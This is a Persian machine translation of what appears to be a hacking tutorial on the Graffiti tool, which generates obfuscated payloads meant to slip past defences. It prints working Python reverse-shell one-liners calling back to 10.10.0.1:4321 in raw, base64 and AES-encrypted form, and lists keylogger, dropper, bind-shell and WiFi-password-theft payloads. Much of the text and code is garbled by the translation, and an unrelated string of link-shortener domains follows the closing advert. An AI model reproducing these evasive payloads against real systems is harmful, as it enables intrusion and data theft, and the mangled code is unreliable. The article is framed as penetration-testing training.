چگونه به استفاده از نقاشی های دیواری به تولید مبهم محموله

آن را هیجان انگیز که برای دریافت پوسته معکوس و یا اجرای یک payload اما گاهی اوقات این چیزهایی که کار نمی کند به عنوان انتظار می رود زمانی که وجود دارد دفاع در بازی. یک راه برای گرفتن در اطراف آن موضوع است obfuscating حمل بار و encoding آن را با استفاده از تکنیک های مختلف معمولا آوردن درجات مختلفی از موفقیت است. نقاشی های دیواری می توانید که اتفاق می افتد.

گرافیتی یک ابزار است که می تواند تولید تاحدودی گیج کننده بر روی کامپیوتر کاربر با استفاده از انواع مختلف تکنیک های رمزگذاری. آن را ارائه می دهد آرایه ای از یک آستر و پوسته در زبان هایی مانند Python, Perl, PHP, دسته ای PowerShell و باش. بر روی کامپیوتر کاربر می تواند کد گذاری با استفاده از base64, hex و AES256, در میان دیگران. همچنین ویژگی های دو حالت از عمل: خط فرمان در حالت و حالت تعاملی.

دیگر ویژگی های مفید از نقاشی های دیواری عبارتند از: توانایی خود را برای ایجاد فایل های حمل بار, ترمینال, تاریخچه گزینه برای اجرای سیستم عامل بومی دستورات و برگه تکمیل در حالت تعاملی. نقاشی های دیواری باید کار خارج از جعبه در لینوکس و مک و ویندوز و این را می توان نصب شده به سیستم به عنوان یک فایل اجرایی در هر دو لینوکس و مک. ما خواهد بود با استفاده از Kali Linux به کشف ابزار زیر.

راه اندازی و نصب و راه اندازی

برای شروع بیایید کلون به مخزن GitHub برای گرافیتی با استفاده از git فرمان:

~# git clone https://github.com/Ekultek/Graffiti شبیه سازی به 'گرافیتی...
کنترل از راه دور: شمارش اشیاء: 212 انجام می شود.
کنترل از راه دور: در مجموع 212 (دلتا 0) مورد استفاده مجدد قرار 0 (دلتا 0) بسته-مورد استفاده مجدد قرار 212
دریافت اشیاء: 100% (212/212), 41.27 KiB | 768.00 KiB/s انجام می شود.
حل و فصل دلتا: 100% (108/108) انجام می شود.

بعدی تغییر به دایرکتوری جدید:

~# cd گرافیتی/

و فهرست مطالب به منظور بررسی همه چیز وجود دارد:

~/گرافیتی# ls نویسان conf.json و غیره graffiti.py install.sh lib اصلی README.md

ما می توانید این ابزار را اجرا کنید با پایتون فرمان — بیایید ببینید کمک منو با ضمیمه در -ثانیه سوئیچ:

~/گرافیتی#, fuzzy, python graffiti.py -h طریقه استفاده: graffiti.py [-h] [-c CODEC] [p-حمل بار] [--ایجاد ظرفیت ترابری اسکریپت-نوع حمل بار-شرح نوع سیستم عامل]
[-l] [-P [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]]] [-lH, گوش دادن آدرس] [-lP گوش دادن-PORT] [-u URL] [-vC] [-H] [-W] [--حافظه] [-mC فرمان [فرمان ...]] [-Vc] اختیاری استدلال: -h, --help نشان می دهد این کمک پیام و خروج -c کدک --کدک, کدک مشخص کردن یک روش رمزگذاری (*به طور پیش فرض=None) -p PAYLOAD --حمل بار حمل بار تصویب راه برای یک بار به استفاده از (*به طور پیش فرض=None) --ایجاد ظرفیت ترابری اسکریپت-نوع حمل بار-شرح نوع سیستم عامل ایجاد یک ظرفیت ترابری فایل و ذخیره آن در داخل ./و غیره/محموله (*به طور پیش فرض=None) -l --لیست لیست همه در دسترس است بر روی کامپیوتر کاربر توسط مسیر (*به طور پیش فرض=False) -P [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]], --شخصی-حمل بار [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]] عبور شخصی خود را امن برای استفاده برای رمزگذاری
(*به طور پیش فرض=None) -lH, گوش دادن-آدرس --lhost گوش دادن-آدرس تصویب یک گوش دادن آدرس به استفاده از حمل بار (اگر نیاز) (*به طور پیش فرض=None) -lP گوش دادن-بندر --lport گوش دادن-پورت تصویب یک گوش دادن پورت برای استفاده از حمل بار (اگر نیاز) (*به طور پیش فرض=None) -تو URL --آدرس URL تصویب یک URL در صورت نیاز با خود حمل بار (*به طور پیش فرض=None) -vC-نمایش-ذخیره شده نمایش داده های cache شده در حال حاضر در حال حاضر در داخل از
پایگاه داده -ثانیه-هیچ-تاریخچه را ذخیره نمی کند تاریخ فرمان (*به طور پیش فرض=True) -W --پاک کردن پاک کردن پایگاه داده و تاریخ (*به طور پیش فرض=False) --حافظه مقداردهی اولیه پایگاه داده به حافظه به جای .db فایل (*به طور پیش فرض=False) -mC فرمان [فرمان ...], --more-دستورات COMMAND [فرمان ...] عبور خارجی بیشتر دستورات این اجازه خواهد داد که آنها را به قابل دسترسی در داخل ترمینال دستورات باید در مسیر شما (*به طور پیش فرض=None) -Vc-نمایش-کدک مشاهده زمان در دسترس کدک ها پشتیبانی می کند و خود را سازگار با زبان های

در اینجا ما با استفاده از آن اطلاعات و اختیاری استدلال که در دسترس هستند.

یک راه ساده تر برای استفاده از نقاشی های دیواری است به نصب آن بر روی سیستم. که راه ما لازم نیست که در دایرکتوری به آن را اجرا کنید — آن را می تواند اجرا از هر نقطه. به سادگی راه اندازی نصب اسکریپت برای شروع:

~/گرافیتی# ./install.sh شروع فایل کپی کردن..
ایجاد فایل اجرایی
ویرایش فایل آمار
از نصب شما نیاز برای اجرا: source ~/.bash_profile

این به ما می گوید ما نیاز به اجرای منبع فرمان ما باش مشخصات کامل نصب و راه اندازی — منبع فرماندهی اساسا بارهای هر توابع در زمان پوسته:

~/گرافیتی# source ~/.bash_profile

در حال حاضر ما باید قادر به اجرای این ابزار از هر نقطه با تایپ کردن نقاشی های دیواری در ترمینال:

~# گرافیتی -h طریقه استفاده: graffiti.py [-h] [-c CODEC] [p-حمل بار] [--ایجاد ظرفیت ترابری اسکریپت-نوع حمل بار-شرح نوع سیستم عامل]
[-l] [-P [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]]] [-lH, گوش دادن آدرس] [-lP گوش دادن-PORT] [-u URL] [-vC] [-H] [-W] [--حافظه] [-mC فرمان [فرمان ...]] [-Vc] اختیاری استدلال: -h, --help نشان می دهد این کمک پیام و خروج -c کدک --کدک, کدک مشخص کردن یک روش رمزگذاری (*به طور پیش فرض=None) -p PAYLOAD --حمل بار حمل بار تصویب راه برای یک بار به استفاده از (*به طور پیش فرض=None) --ایجاد ظرفیت ترابری اسکریپت-نوع حمل بار-شرح نوع سیستم عامل ایجاد یک ظرفیت ترابری فایل و ذخیره آن در داخل ./و غیره/محموله (*به طور پیش فرض=None) -l --لیست لیست همه در دسترس است بر روی کامپیوتر کاربر توسط مسیر (*به طور پیش فرض=False) -P [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]], --شخصی-حمل بار [حمل بار [اسکریپت-نوع حمل بار-نوع و توضیحات ...]] عبور شخصی خود را امن برای استفاده برای رمزگذاری
(*به طور پیش فرض=None) -lH, گوش دادن-آدرس --lhost گوش دادن-آدرس تصویب یک گوش دادن آدرس به استفاده از حمل بار (اگر نیاز) (*به طور پیش فرض=None) -lP گوش دادن-بندر --lport گوش دادن-پورت تصویب یک گوش دادن پورت برای استفاده از حمل بار (اگر نیاز) (*به طور پیش فرض=None) -تو URL --آدرس URL تصویب یک URL در صورت نیاز با خود حمل بار (*به طور پیش فرض=None) -vC-نمایش-ذخیره شده نمایش داده های cache شده در حال حاضر در حال حاضر در داخل از
پایگاه داده -ثانیه-هیچ-تاریخچه را ذخیره نمی کند تاریخ فرمان (*به طور پیش فرض=True) -W --پاک کردن پاک کردن پایگاه داده و تاریخ (*به طور پیش فرض=False) --حافظه مقداردهی اولیه پایگاه داده به حافظه به جای .db فایل (*به طور پیش فرض=False) -mC فرمان [فرمان ...], --more-دستورات COMMAND [فرمان ...] عبور خارجی بیشتر دستورات این اجازه خواهد داد که آنها را به قابل دسترسی در داخل ترمینال دستورات باید در مسیر شما (*به طور پیش فرض=None) -Vc-نمایش-کدک مشاهده زمان در دسترس کدک ها پشتیبانی می کند و خود را سازگار با زبان های

گزینه 1: با استفاده از نقاشی های دیواری در خط فرمان حالت

اولین راه برای اجرای نقاشی های دیواری است که در حالت عادی خط فرمان در حالت. همه ما باید انجام دهید این است که با تصویب این استدلال پس از فرمان فقط می خواهم شما را با هر ابزار دیگر یا اسکریپت. برای مثال ما می توانید از لیست موجود بر روی کامپیوتر کاربر با -l سوئیچ:

~# گرافیتی -l ویندوز بر روی کامپیوتر کاربر: /ویندوز/دسته/nc_bind.json
/ویندوز/دسته/certutil_exe.json
/ویندوز/دسته/nc_reverse.json
/ویندوز/دسته/sync_appv.json
/ویندوز/python/socket_reverse.json
/ویندوز/powershell/keylogger.json
/ویندوز/powershell/escalate_service.json
/ویندوز/powershell/meterpreter_shell.json
/ویندوز/powershell/cleartext_wifi.json
/ویندوز/perl/socket_reverse.json
/ویندوز/یاقوت/socket_reverse.json لینوکس بر روی کامپیوتر کاربر: /لینوکس/python/socket_reverse.json
/لینوکس/php/socket_reverse.json
/لینوکس/perl/socket_reverse.json
/لینوکس/یاقوت/socket_reverse.json
/لینوکس/باش/subdomain_enum_crt.json
/لینوکس/باش/netcat_reverse.json
/لینوکس/باش/download_linux_exploit_suggester.json
/لینوکس/باش/pipe_reverse.json
/لینوکس/باش/subdomain_enum_archive.json
/لینوکس/باش/suid.json
/لینوکس/باش/download_checkers.json
/لینوکس/باش/netcat_binder.json
/لینوکس/باش/download_nmap_scripts.json
/لینوکس/باش/download_linux_priv_checker.json
/لینوکس/باش/bash_reverse.json

ما می توانیم گزینه های وجود دارد برای راحت پوسته پایتون پوسته و بسیاری دیگر از هم جدا و بین ویندوز و لینوکس.

ما می توانیم با استفاده از -Vc گزینه ای برای مشاهده در دسترس نرم افزارهای تبدیل کننده و مربوط به زبان آنها در دسترس است برای:

~# گرافیتی -Vc CODEC: قابل قبول:
aes256 پایتون
atbash پایتون
xor php,python
base64,powershell, php,python,perl,ruby باش,دسته
سحر و جادو powershell,php,python,perl,ruby باش,دسته
خام powershell,php,python,perl,ruby باش,دسته
rot13, python,ruby,php

The -p سوئیچ نان و کره از نقاشی های دیواری — استفاده از آن برای مشخص کردن یک بار به دنبال -c برای مشخص کردن رمزگذاری روش و در نهایت -lH و -lP به مجموعه ای از گوش دادن آدرس و پورت بود. در اینجا است که یک پایتون معکوس پوسته در فرمت raw هیچ معنی را پشتیبانی می کند:

~# گرافیتی -p /لینوکس/python/socket_reverse.json -c خام -lH 10.10.0.1 -lP 4321 python -c 'واردات socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4321));os.dup2(s.fileno(),0); سیستم عامل.dup2(s.fileno(),1); سیستم عامل.dup2(s.fileno(),2);p=فرزند.تماس(["/bin/sh","من"]);'

که تف فرمان مناسب معکوس پوسته با تمام اطلاعات پر شده در. همه ما باید انجام دهیم در این نقطه است که کپی کردن و چسباندن.

بیایید سعی کنید یک مثال دیگر. در اینجا است که همان پایتون معکوس پوسته base64 کد گذاری شده در:

~# گرافیتی -p /لینوکس/python/socket_reverse.json -c base64 -lH 10.10.0.1 -lP 4321 python -c 'exec("aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzlg9zo3m9c29ja2v0lnnvy2tldchzb2nrzxququzfsu5fvcxzb2nrzxquu09ds19tvfjfqu0po3muy29ubmvjdcgoijewljewljaumsisndmymskpo29zlmr1cdiocy5mawxlbm8okswwktsgb3muzhvwmihzlmzpbgvubygpldepoybvcy5kdxaykhmuzmlszw5vkcksmik7cd1zdwjwcm9jzxnzlmnhbgwowyivymlul3noiiwilwkixsk7".decode("base64"))'

و این بار با استفاده از AES256 رمز:

~# گرافیتی -p /لینوکس/python/socket_reverse.json -c aes256 -lH 10.10.0.1 -lP 4321 # مطمئن باشید که به هدف است PyCrypto در سیستم خود را!
python -c 'واردات از base64;از رمزنگاری واردات تصادفی;از رمزنگاری.رمز واردات AES;از رمزنگاری.Util واردات Counter;ct=base64.b64decode("7mC355qybpwkZRVMOGKbHBNqNKFwVbBcpgbz0cwqlnt6saf3ywln9dmifph4gcrhfveghr8xtewiulp3moppai869ifn5fzx3y32m9tgqivzvl0to0ntu2gqxtaauni+8p0+Au/fxjgX8AwpuJOl7lIPFxVHTk/zRLu0mg257OknhKgJxuQgUM5SrXG+XJcg1BRohs0AHJSGjLQs0oqfBxV4WPLLmvqhp76djhtndgakxf0chhbkja+J6umbjMaG+6ZbJSz/7SQo+9XWzTGNU5w80/KP");dk=base64.b64decode("gGhVa2B/DPmOp1tfIL2AhdyVyTapvpgtkCLFZ4WL0ou=");iv=base64.b64decode("VSUepHglfitT7q08vuekMA==");ivi=int(iv.encode("hex"),16);co=Counter.new(AES.block_size*8,initial_value=ivi);a=AES.new(dk,AES.MODE_CBC,counter=co);r=a.decrypt(ct);exec(str(r))'

به جای رفتن و در حال اجرا این دستورات دوباره گرافیتی نگه می دارد و یک کش از کامپیوتر برای دسترسی آسان — با استفاده از -vC گزینه را به آنها را ببینید:

~# گرافیتی -vC در مجموع 3 محموله در حال حاضر زبان: python
حمل بار از نوع معکوس
ظرفیت ترابری: python -c 'واردات socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4321));os.dup2(s.fileno(),0); سیستم عامل.dup2(s.fileno(),1); سیستم عامل.dup2(s.fileno(),2);p=فرزند.تماس(["/bin/sh","من"]);' زبان: python
حمل بار از نوع معکوس
ظرفیت ترابری: python -c 'exec("aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzlg9zo3m9c29ja2v0lnnvy2tldchzb2nrzxququzfsu5fvcxzb2nrzxquu09ds19tvfjfqu0po3muy29ubmvjdcgoijewljewljaumsisndmymskpo29zlmr1cdiocy5mawxlbm8okswwktsgb3muzhvwmihzlmzpbgvubygpldepoybvcy5kdxaykhmuzmlszw5vkcksmik7cd1zdwjwcm9jzxnzlmnhbgwowyivymlul3noiiwilwkixsk7".decode("base64"))' زبان: python
حمل بار از نوع معکوس
ظرفیت ترابری: python -c 'واردات از base64;از رمزنگاری واردات تصادفی;از رمزنگاری.رمز واردات AES;از رمزنگاری.Util واردات Counter;ct=base64.b64decode("7mC355qybpwkZRVMOGKbHBNqNKFwVbBcpgbz0cwqlnt6saf3ywln9dmifph4gcrhfveghr8xtewiulp3moppai869ifn5fzx3y32m9tgqivzvl0to0ntu2gqxtaauni+8p0+Au/fxjgX8AwpuJOl7lIPFxVHTk/zRLu0mg257OknhKgJxuQgUM5SrXG+XJcg1BRohs0AHJSGjLQs0oqfBxV4WPLLmvqhp76djhtndgakxf0chhbkja+J6umbjMaG+6ZbJSz/7SQo+9XWzTGNU5w80/KP");dk=base64.b64decode("gGhVa2B/DPmOp1tfIL2AhdyVyTapvpgtkCLFZ4WL0ou=");iv=base64.b64decode("VSUepHglfitT7q08vuekMA==");ivi=int(iv.encode("hex"),16);co=Counter.new(AES.block_size*8,initial_value=ivi);a=AES.new(dk,AES.MODE_CBC,counter=co);r=a.decrypt(ct);exec(str(r))'

ما همچنین می توانید پاک کردن تاریخچه با -W سوئیچ:

~# گرافیتی -W پاک کردن پایگاه داده و فایل تاریخ
پایگاه داده ها و تاریخچه فایل های پاک

گزینه 2: با استفاده از نقاشی های دیواری در حالت تعاملی

راه دیگر برای اجرای نقاشی های دیواری است که در آن حالت تعاملی است که می آید با یک ساخته شده است در ترمینال محیط زیست است. به سادگی این ابزار را اجرا کنید و بدون هر گونه استدلال به رها کردن در:

~# گرافیتی ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__|
/ \ __\_ __ \__ \\ __\\ __\| \ __\ |
\ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/
v(0.0.10) هیچ استدلال شده است به تصویب رسید انداختن به ترمینال نوع " کمک/?` به دریافت کمک همه دستورات که نشستن داخل `/bin` در دسترس هستند در ترمینال
Traceback (most recent call last): فایل "graffiti.py" خط 5, in <module>
اصلی() فایل "/root/.graffiti/.install/etc/main/main.py" خط 10 در اصلی تجزیه کننده().single_run_args(parsed_config مکان نما) فایل "/root/.graffiti/.install/etc/lib/arguments.py" خط 182 در single_run_args
).do_start(conf["گرافیتی"]["saveCommandHistory"]) فایل "/root/.graffiti/.install/etc/lib/terminal_display.py" خط 290 در do_start
خود.reflect_memory() فایل "/root/.graffiti/.install/etc/lib/terminal_display.py" خط 77 در reflect_memory با باز کردن(خود.full_history_file_path) به عنوان سابقه:
IOError: [Errno 2] بدون چنین فایل یا دایرکتوری: '/root/.نقاشی های دیواری/.نصب/و غیره/.تاریخچه/2019-11-14/نقاشی های دیواری.تاریخچه'

اگر شما دریافت خطا در بالا همه شما باید انجام دهید این است ایجاد یک تاریخچه فایل در دایرکتوری های مناسب — استفاده از لمس فرمان مانند:

~# لمس است .نقاشی های دیواری/.نصب/و غیره/.تاریخچه/2019-11-14/نقاشی های دیواری.تاریخچه

در حال حاضر هنگامی که ما آن را اجرا کنید ما با موفقیت وارد حالت تعاملی که با آن خود را بی درنگ:

~# گرافیتی ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__|
/ \ __\_ __ \__ \\ __\\ __\| \ __\ |
\ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/
v(0.0.10) هیچ استدلال شده است به تصویب رسید انداختن به ترمینال نوع " کمک/?` به دریافت کمک همه دستورات که نشستن داخل `/bin` در دسترس هستند در ترمینال
[email protected]گرافیتی:~/گرافیتی#

برای دیدن منوی help, نوع کمک و یا ? در اعلان:

[email protected]گرافیتی:~/گرافیتی# ? توضیحات / کنترل فرمان
--------- -------------- کمک/? نشان می دهد این کمک خارجی لیست موجود خارجی دستورات ذخیره سازی/ذخیره صفحه نمایش تمام محموله که در حال حاضر در پایگاه داده لیست/نمایش لیست همه در دسترس است بر روی کامپیوتر کاربر جستجو <عبارت> جستجو برای یک خاص حمل بار استفاده از <ترابری> <رمز گذار> با استفاده از این ظرفیت ترابری و رمز آن را با استفاده از یک مشخص شده coder اطلاعات دریافت اطلاعات در تمام محموله بررسی بررسی برای به روز رسانی تاریخچه/mem[ory] نمایش تاریخ فرمان خروج/ترک خروج ترمینال و اجرای جلسه رمز <script-type> <رمز گذار> رمز یک ارائه ظرفیت ترابری بررسی بررسی برای به روز رسانی

ما می توانید بررسی کنید اگر ما آخرین نسخه از این ابزار در حال اجرا را بررسی دستور:

[email protected]گرافیتی:~/گرافیتی# بررسی از https://github.com/Ekultek/Graffiti * شعبه استاد -> FETCH_HEAD
در حال حاضر تا به امروز است.

آن را نیز مفید به دانستن چه خارجی دستورات ما در دسترس ما بنابراین ما نیازی به خروج از حالت تعاملی و یا سوئیچ به یک تب جدید برای اجرای دستورات معمول. استفاده از external command برای مشاهده لیست این:

[email protected]گرافیتی:~/گرافیتی# خارجی busybox nc bzdiff zsh5 uname کشتن networkctl لمس systemd-اطلاع hashcat udevadm systemd bzfgrep tempfile ls bzcat goscan vdir df rzsh dd cpio ulockmgr_server systemctl rbash grep bzexe ntfssecaudit dirsearch findmnt zcmp umount nisdomainname خواب ntfsinfo kbd_mode dir systemd-مهار همگام دستور ifconfig zforce mknod sed systemd-hwdb mountpoint znew mktemp kmod rsync fgconsole نانو loginctl chvt systemd-ask-رمز ntfsrecover lowntfs-3g اجرا-قطعات rm systemd-tmpfiles dnsdomainname gzexe غیرفشرده ping4 keyctl ping6 netstat journalctl ntfsfix bzmore ntfscat باش zmore ntfsmove pidof bzgrep zdiff systemd-فرار ln systemd-sysusers ypdomainname zegrep ورود ntfstruncate ntfscluster lsblk nmap chmod اکو ntfs-3g wdctl cp sh.distrib usleep ps fusermount mkdir bzcmp mt-گنو فیوزینگ rmdir ششم zless بیشتر lsmod openvt setupcon telnet ntfs-3g.کاوشگر bunzip2 pwd ntfswipe درست systemd-tty-ask-رمز عبور-عامل zcat stty setfacl کوه گربه mt plymouth mv bzip2recover bzegrep zsh غلط تار domainname ip داش getfacl hciconfig setfont zgrep systemd-ماشین-id-راه اندازی bzip2 egrep chacl nc.سنتی میزبان پینگ zfgrep chgrp پایتون پیدا fgrep که ntfsfallocate ntfscmp unicode_start ftp bzless readlink تاریخ netcat gunzip loadkeys dmesg dumpkeys اس اس sendprobe روشن su ntfsusermap مرحله تشکیل هلیوم وقتی sh rnano gzip ntfsls ssh

برای مثال ما می توانیم اجرای یک دستور مانند uname -a به طور مستقیم از نقاشی های دیواری تعاملی سریع:

[email protected]گرافیتی:~/گرافیتی# uname -a لینوکس drd 5.2.0-kali3-amd64 #1 SMP دبیان 5.2.17-1kali2 (2019-10-17) x86_64 گنو/لینوکس

این لیست فرمان را نشان می دهد همه در دسترس بر روی کامپیوتر کاربر است -l سوئیچ از قبل:

[email protected]گرافیتی:~/گرافیتی# لیست /ویندوز/دسته/nc_bind.json
/ویندوز/دسته/certutil_exe.json
/ویندوز/دسته/nc_reverse.json
/ویندوز/دسته/sync_appv.json
/ویندوز/python/socket_reverse.json
/ویندوز/powershell/keylogger.json
/ویندوز/powershell/escalate_service.json
/ویندوز/powershell/meterpreter_shell.json
/ویندوز/powershell/cleartext_wifi.json
/ویندوز/perl/socket_reverse.json
/ویندوز/یاقوت/socket_reverse.json
/لینوکس/python/socket_reverse.json
/لینوکس/php/socket_reverse.json
/لینوکس/perl/socket_reverse.json
/لینوکس/یاقوت/socket_reverse.json
/لینوکس/باش/subdomain_enum_crt.json
/لینوکس/باش/netcat_reverse.json
/لینوکس/باش/download_linux_exploit_suggester.json
/لینوکس/باش/pipe_reverse.json
/لینوکس/باش/subdomain_enum_archive.json
/لینوکس/باش/suid.json
/لینوکس/باش/download_checkers.json
/لینوکس/باش/netcat_binder.json
/لینوکس/باش/download_nmap_scripts.json
/لینوکس/باش/download_linux_priv_checker.json
/لینوکس/باش/bash_reverse.json

ما همچنین می توانید اطلاعات در مورد محموله با اطلاعات فرماندهی. متاسفانه, آن را اجازه نمی دهد که ما تنها یک بار به جای فهرست همه آنها در یک بار:

[email protected]گرافیتی:~/گرافیتی# info نوع اسکریپت: دسته ای
نوع اجرا: اتصال
اطلاعات: با استفاده از ویندوز راحت برای شروع یک bindshell
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/دسته/nc_bind.json نوع اسکریپت: دسته ای
نوع اجرا: dropper
اطلاعات: با استفاده از certutil به دانلود یک فایل بدون ایجاد سوء ظن
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/دسته/certutil_exe.json نوع اسکریپت: دسته ای
نوع اجرا: معکوس
اطلاعات: با استفاده از netcat برای شروع یک معکوس پوسته
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/دسته/nc_reverse.json نوع اسکریپت: دسته ای
نوع اجرا: dropper
اطلاعات: با استفاده از Microsoft SyncAppvPublishingServer به دانلود و اجرای یک فایل powershell
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/دسته/sync_appv.json نوع اسکریپت: python
نوع اجرا: معکوس
اطلاعات: با استفاده از python socket کتابخانه برای اتصال و اجرای دستورات با فرزند
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/python/socket_reverse.json نوع اسکریپت: powershell
نوع اجرا: دیگر
اطلاعات: ایجاد یک keylogger است که فروشگاه ها در C:\Users\Public\key.log
Full path: /root/.نقاشی های دیواری/.نصب/و غیره/etc/کامپیوتر/ویندوز/powershell/keylogger.json ...

برای جستجو های خاص payload استفاده از جستجو در فرمان. برای مثال برای جستجوی پایتون بر روی کامپیوتر کاربر:

[email protected]گرافیتی:~/گرافیتی# جستجو پایتون یافت 2 گزینه های مربوطه:
------------------------------
/ویندوز/python/socket_reverse.json
/لینوکس/python/socket_reverse.json

ما می توانیم یک بار با استفاده از فرمان و به دنبال آن مورد نظر حمل بار و نوع رمزگذاری استفاده کنید:

[email protected]گرافیتی:~/گرافیتی# استفاده /لینوکس/python/socket_reverse.json خام وارد LHOST: 10.10.0.1
وارد LPORT: 4321
python -c 'واردات socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4321));os.dup2(s.fileno(),0); سیستم عامل.dup2(s.fileno(),1); سیستم عامل.dup2(s.fileno(),2);p=فرزند.تماس(["/bin/sh","من"]);'

آن را بی درنگ ما برای گوش دادن آدرس IP و پورت و آن را به نمایش فرمان برای معکوس پوسته هنگامی که آن را انجام داده است.

شبیه به نقاشی های دیواری را در خط فرمان حالت ما می توانید تاریخچه ای از ذخیره سازی بر روی کامپیوتر کاربر با استفاده از ذخیره سازی از دستور:

[email protected]گرافیتی:~/گرافیتی# کش نوع: معکوس
اعدام: Python
ظرفیت ترابری: u'python -c \'واردات socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4321));os.dup2(s.fileno(),0); سیستم عامل.dup2(s.fileno(),1); سیستم عامل.dup2(s.fileno(),2);p=فرزند.تماس(["/bin/sh","من"]);\"

ما همچنین می توانید نمایش تاریخ فرمان با تاریخچه گزینه:

[email protected]گرافیتی:~/گرافیتی# history 1 ? 2 خروج 3 ? 4 بررسی 5 خارجی 6 id 7 uname 8 uname -a 9 ? 10 فهرست 11 info 12 لیست 13 info /لینوکس/python/socket_reverse.json 14 ? 15 info 16 ? 17 جستجو پایتون معکوس 18 جستجو پایتون 19 استفاده از /لینوکس/python/socket_reverse.json خام 20 گرافیتی -h 21 استفاده از /لینوکس/python/socket_reverse.json xor 22 ? 23 cached 24 تاریخچه

در نهایت به خروج از حالت تعاملی به سادگی نوع خروج سریع:

[email protected]گرافیتی:~/گرافیتی# خروج صرفه جویی در زمان تاریخ را در یک فایل
خروج ترمینال

کاغذ بسته بندی

در این آموزش ما آموخته است که چگونه به استفاده از ابزاری به نام نقاشی دیواری برای تولید تاحدودی گیج کننده بر روی کامپیوتر کاربر برای استفاده در تست نفوذ و هک. ما مجموعه ای از ابزار و نصب آن بر روی سیستم ما برای استفاده آسان. ما به کاوش در خط فرمان حالت و برخی از گزینه های آن موجود است از جمله مثال محموله مشاهده تاریخچه و ایجاد محموله کد گذاری در انواع تکنیک های. ما سپس در زمان یک نگاه در این حالت تعاملی و چگونه آن را به آسانی می تواند مورد استفاده قرار گیرد برای تولید محموله از تعاملی سریع است.

گذشته دفاع با مبهم محموله بوده است هرگز آسان تر با نقاشی های دیواری.

می خواهید شروع به ساختن پول به عنوان یک کلاه سفید هکر? پرش شروع خود را-کلاه سفید هک حرفه ای با ما 2020 حق بیمه هک اخلاقی, گواهینامه آموزشی از بسته نرم افزاری جدید Null Byte فروشگاه و دریافت بیش از 60 ساعت آموزش از هک اخلاقی حرفه ای است.

خرید در حال حاضر (96٪) >

تصویر پوشش های Pixabay/Pexels

tinyurlis.gdv.gdv.htclck.ruulvis.netshrtco.detny.im

Leave a reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>